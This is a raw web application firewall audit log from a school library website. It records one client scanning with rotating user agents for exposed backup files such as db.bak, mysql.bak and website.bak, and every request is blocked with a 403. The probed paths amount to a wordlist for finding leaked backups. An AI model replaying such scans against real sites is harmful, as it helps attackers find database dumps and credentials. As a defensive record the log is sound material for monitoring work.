[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227113400 1856 (- - -) Stopwatch2: 1747683227113400 1856; combined=635, p1=305, p2=305, p3=0, p4=0, p5=25, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93eea568-Z-- --5a20b313-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-AAAABY 103.236.140.4 33902 103.236.140.4 8181 --5a20b313-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227121 --5a20b313-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a20b313-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227125753 1572 (- - -) Stopwatch2: 1747683227125753 1572; combined=633, p1=308, p2=298, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a20b313-Z-- --0ecc3f07-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-QAAABA 103.236.140.4 33902 103.236.140.4 8181 --0ecc3f07-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182455 --0ecc3f07-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ecc3f07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227129810 1554 (- - -) Stopwatch2: 1747683227129810 1554; combined=600, p1=301, p2=272, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ecc3f07-Z-- --39a55a58-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-wAAAAE 103.236.140.4 33902 103.236.140.4 8181 --39a55a58-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871869 --39a55a58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39a55a58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227143373 1597 (- - -) Stopwatch2: 1747683227143373 1597; combined=668, p1=315, p2=327, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a55a58-Z-- --9473526a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo_QAAAAs 103.236.140.4 33756 103.236.140.4 8181 --9473526a-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995032 --9473526a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9473526a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227163721 1913 (- - -) Stopwatch2: 1747683227163721 1913; combined=715, p1=348, p2=338, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9473526a-Z-- --daf68c5f-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopAgAAAAM 103.236.140.4 33760 103.236.140.4 8181 --daf68c5f-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182489 --daf68c5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --daf68c5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227636626 2724 (- - -) Stopwatch2: 1747683227636626 2724; combined=987, p1=322, p2=626, p3=0, p4=0, p5=38, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daf68c5f-Z-- --7552ad4c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopBAAAAAg 103.236.140.4 33760 103.236.140.4 8181 --7552ad4c-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182503 --7552ad4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7552ad4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227664366 1868 (- - -) Stopwatch2: 1747683227664366 1868; combined=670, p1=333, p2=309, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7552ad4c-Z-- --43230106-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopBwAAABQ 103.236.140.4 33760 103.236.140.4 8181 --43230106-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871898 --43230106-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43230106-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227694830 2245 (- - -) Stopwatch2: 1747683227694830 2245; combined=825, p1=478, p2=319, p3=0, p4=0, p5=27, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43230106-Z-- --40f4ff0c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCQAAAAc 103.236.140.4 34838 103.236.140.4 8181 --40f4ff0c-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227142 --40f4ff0c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --40f4ff0c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227729473 2538 (- - -) Stopwatch2: 1747683227729473 2538; combined=842, p1=345, p2=464, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f4ff0c-Z-- --699afc06-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCgAAABE 103.236.140.4 34838 103.236.140.4 8181 --699afc06-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182512 --699afc06-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --699afc06-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227737231 1693 (- - -) Stopwatch2: 1747683227737231 1693; combined=723, p1=379, p2=317, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --699afc06-Z-- --d4341c7d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCwAAAAo 103.236.140.4 34838 103.236.140.4 8181 --d4341c7d-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182519 --d4341c7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d4341c7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227749820 2322 (- - -) Stopwatch2: 1747683227749820 2322; combined=810, p1=374, p2=408, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4341c7d-Z-- --4eeda311-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopDAAAAAw 103.236.140.4 34838 103.236.140.4 8181 --4eeda311-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182530 --4eeda311-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4eeda311-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227774188 1984 (- - -) Stopwatch2: 1747683227774188 1984; combined=788, p1=414, p2=347, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eeda311-Z-- --7f41984a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEQAAAAs 103.236.140.4 34924 103.236.140.4 8181 --7f41984a-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530881 --7f41984a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f41984a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227863077 2254 (- - -) Stopwatch2: 1747683227863077 2254; combined=781, p1=327, p2=420, p3=0, p4=0, p5=34, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f41984a-Z-- --f0b02d27-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEgAAABI 103.236.140.4 34924 103.236.140.4 8181 --f0b02d27-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182537 --f0b02d27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0b02d27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227867995 1589 (- - -) Stopwatch2: 1747683227867995 1589; combined=581, p1=296, p2=261, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b02d27-Z-- --a2b0c071-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEwAAABU 103.236.140.4 34924 103.236.140.4 8181 --a2b0c071-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182542 --a2b0c071-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a2b0c071-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227871376 1810 (- - -) Stopwatch2: 1747683227871376 1810; combined=713, p1=310, p2=376, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2b0c071-Z-- --c9de9a18-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUQAAAFQ 103.236.140.4 35018 103.236.140.4 8181 --c9de9a18-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871956 --c9de9a18-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c9de9a18-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227890315 2284 (- - -) Stopwatch2: 1747683227890315 2284; combined=711, p1=309, p2=374, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9de9a18-Z-- --78dd331c-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUgAAAEw 103.236.140.4 35018 103.236.140.4 8181 --78dd331c-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182570 --78dd331c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --78dd331c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
